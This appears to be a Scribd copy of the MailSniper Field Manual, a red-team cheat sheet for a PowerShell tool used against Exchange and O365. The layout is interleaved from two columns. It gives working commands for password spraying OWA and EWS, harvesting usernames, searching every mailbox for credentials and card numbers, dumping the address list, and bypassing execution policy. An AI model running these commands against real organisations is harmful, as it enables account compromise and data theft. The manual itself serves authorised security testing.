Scribd Logo
Upload

Welcome to Scribd!

  • 487 views

    MailSniper Field Manual

    Uploaded by

    Reddy Froggyman
    The document provides instructions for using the MailSniper PowerShell module to perform various email security assessments including searching mailboxes, harvesting domain and user information, password spraying, accessing the global address list, and more.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd

    MailSniper Field Manual

    Uploaded by

    Reddy Froggyman
    487 views2 pages
    The document provides instructions for using the MailSniper PowerShell module to perform various email security assessments including searching mailboxes, harvesting domain and user information, password spraying, accessing the global address list, and more.

    Original Description:

    manual sniping email

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    The document provides instructions for using the MailSniper PowerShell module to perform various email security assessments including searching mailboxes, harvesting domain and user information, password spraying, accessing the global address list, and more.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Download as pdf or txt
    487 views2 pages

    MailSniper Field Manual

    Uploaded by

    Reddy Froggyman
    The document provides instructions for using the MailSniper PowerShell module to perform various email security assessments including searching mailboxes, harvesting domain and user information, password spraying, accessing the global address list, and more.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Download as pdf or txt
    of 2

    Search All Mailboxes with Default Terms

    1. On a domain-joined system specify the current domain username the


    PowerShell session is running as for the -ImpersonationAccount option.
    Invoke-GlobalMailSearch will prompt for administrative credentials (i.e.
    member of "Exchange Organization Administrators" or "Organization
    Management" group). Once administrative credentials have been
    entered a PS remoting session is setup to the Exchange server where
    the ApplicationImpersonation role is then granted to the current user
    enabling them to search everyone’s mailbox. By default, it will search for
    the terms ‘password’, ‘creds’, and ‘credentials’.
    PS C:\> Invoke-GlobalMailSearch -ImpersonationAccount
    current-username -ExchHostname Exch01 -OutputCsv
    global-email-search.csv

    Search All Mailboxes for Credit Card Numbers

    1. Invoke-GlobalMailSearch and Invoke-SelfSearch accept regular


    expressions with the -Regex option. The following command will attempt
    to match on valid VISA, Mastercard, and American Express credit card
    numbers in the body and subjects of emails.
    PS C:\> Invoke-GlobalMailSearch -ImpersonationAccount
    current-username -AutoDiscoverEmail current-
    [email protected] -Regex '.*3[47][0-9]{13}.*|.*(?:5[1-
    5][0-9]{2}|222[1-9]|22[3-9][0-9]|2[3-6][0-
    9]{2}|27[01][0-9]|2720)[0-9]{12}.*|.*4[0-9]{12}(?:[0-
    9]{3}).*'

    Additional Resources

    MailSniper Github Repo: https://github.com/dafthack/MailSniper

    General MailSniper Info: https://www.blackhillsinfosec.com/?p=5296 MailSniper Field Manual


    GAL & Password Spraying: https://www.blackhillsinfosec.com/?p=5330

    Bypassing 2FA: https://www.blackhillsinfosec.com/?p=5396

    Invoke-OpenInboxFinder: https://www.blackhillsinfosec.com/?p=5871

    Questions or comments please contact me at: beau<at>dafthack.com

    Twitter: @dafthack

    By Beau Bullock (@dafthack)


    Getting Started Get Active Directory User Names From EWS

    1. Download the MailSniper.ps1 script from: 1. With a list of valid email addresses (email-list.txt) point Get-
    https://github.com/dafthack/MailSniper ADUsernameFromEWS at an EWS portal. It will prompt for creds.
    2. Start a new PowerShell session from a command terminal. PS C:\> Get-ADUsernameFromEWS -EmailList email-
    C:\> powershell.exe -exec bypass list.txt -ExchHostname outlook.office365.com -Remote
    3. Import MailSniper.
    PS C:\> Import-Module .\MailSniper.ps1 Find Inboxes with Too Broad Permissions

    Harvest Domain 1. Generate a list of email addresses (email-list.txt) to check if their mailbox
    is openly readable by other users.
    1. Harvest the internal domain name of the target org (mail.domain.com). 2. Use Invoke-OpenInboxFinder against the target EWS server specifying
    PS C:\> Invoke-DomainHarvestOWA -ExchHostname the ExchHostname accordingly (works with O365 too). It will prompt for
    mail.domain.com creds.
    PS C:\> Invoke-OpenInboxFinder -EmailList email-
    Harvest Usernames list.txt -ExchHostname outlook.office365.com -Remote
    1. Generate a list (userlist.txt) of potential usernames in the format Search Current Mailbox with Default Terms
    ‘DOMAIN\username’ or ‘[email protected]’.
    2. Harvest valid usernames from an OWA portal (mail.domain.com). 1. On a domain-joined system specify the email address of the current
    PS C:\> Invoke-UsernameHarvestOWA -ExchHostname domain user the PowerShell session is running as for the -Mailbox
    mail.domain.com -UserList .\userlist.txt -Threads 1 - option. Invoke-SelfSearch will search the Inbox for the terms ‘password’,
    OutFile owa-valid-users.txt ‘creds’, and ‘credentials’.
    PS C:\> Invoke-SelfSearch -Mailbox current-
    Password Spraying [email protected]
    1. Generate a list (userlist.txt) of usernames to password spray. Search Current Mailbox with Custom Terms Against Remote Portal
    2. Choose a password (Summer2017).
    3. Spray an OWA portal (mail.domain.com). 1. Specify custom terms to search for with the -Terms option. Specifying
    PS C:\> Invoke-PasswordSprayOWA -ExchHostname the -Remote option will prompt for a user’s credentials. This can be used
    mail.domain.com -UserList .\userlist.txt -Password to search the inbox of a user remotely against an Internet facing EWS
    Summer2017 -Threads 15 -OutFile owa-sprayed-creds.txt server (works for O365 too).
    4. Or… Spray EWS. PS C:\> Invoke-SelfSearch -Mailbox current-
    PS C:\> Invoke-PasswordSprayEWS -ExchHostname [email protected] -ExchHostname mail.domain.com -Terms
    mail.domain.com -UserList .\userlist.txt -Password "*passwords*","*super secret*","*industrial control
    Summer2017 -Threads 15 -OutFile sprayed-ews-creds.txt systems*","*scada*","*launch codes*" -Remote

    Access Global Address List Search Current Mailbox Including Attachments and Download Matches
    1. Using a valid credential point Get-GlobalAddressList to either an OWA or 1. Specifying the -CheckAttachments option will cause Invoke-SelfSearch
    EWS server (it will try both) and set the -UserName and -Password or Invoke-GlobalMailSearch to search the current user’s mailbox for the
    options accordingly. default terms including attachments. It will download any attachments
    PS C:\> Get-GlobalAddressList -ExchHostname that match to ‘C:\temp’
    mail.domain.com -UserName domain\username -Password PS C:\> Invoke-SelfSearch -Mailbox current-
    Summer2017 -OutFile global-address-list.txt [email protected] -CheckAttachments -DownloadDir
    C:\temp

    You might also like